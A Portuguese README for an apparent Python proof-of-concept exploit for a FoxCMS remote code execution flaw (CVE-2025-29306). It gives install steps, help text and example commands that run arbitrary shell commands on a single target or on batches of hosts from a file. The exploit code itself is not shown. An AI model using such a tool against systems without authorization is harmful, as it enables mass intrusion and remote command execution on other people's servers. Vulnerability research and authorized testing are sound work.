
Prova de Conceito (PoC) para CVE-2025-29306, uma vulnerabilidade de Execução Remota de Código no FoxCMS. Este script Python escaneia alvos únicos ou múltiplos, executa comandos e relata hosts vulneráveis.
Um exploit em Python para CVE-2025-29306, uma vulnerabilidade de execução remota de código no FoxCMS. Esta ferramenta permite testar alvos únicos ou escanear vários hosts em lote.
git clone https://github.com/mattb709/CVE-2025-29306-PoC-FoxCMS-RCE
.git
cd CVE-2025-29306-PoC-FoxCMS-RCE
pip install -r requirements.txt
requestsbeautifulsoup4argparseInstale os requisitos com:
pip install requests beautifulsoup4
usage: foxcms_rce.py [-h] -c COMMAND (-t TARGET | -f TARGETS_FILE)
CVE-2025-29306 Exploit Checker
opções:
-h, --help mostra esta mensagem de ajuda e sai
-c COMMAND, --command COMMAND
Comando a ser executado nos hosts vulneráveis
-t TARGET, --target TARGET
Alvo único no formato ip:porta
-f TARGETS_FILE, --targets-file TARGETS_FILE
Arquivo contendo vários alvos, um por linha, no formato ip:porta
python CVE-2025-29306-PoC -t 192.168.1.100:8080 -c "whoami"
python CVE-2025-29306-PoC -f targets.txt -c "whoami"
python CVE-2025-29306-PoC -f targets.txt -c "whoami" > results.txt
O arquivo de alvos deve conter um alvo por linha no formato:
ip:porta
Exemplo:
192.168.1.100:80
10.10.10.5:443
172.16.32.15:8080
O script fornece:
foxcms_rce_results.txt
Esta ferramenta é apenas para fins educacionais e de teste autorizado. O autor não se responsabiliza por qualquer uso indevido ou dano causado por este programa.
Licença MIT - Consulte o arquivo LICENSE para obter detalhes.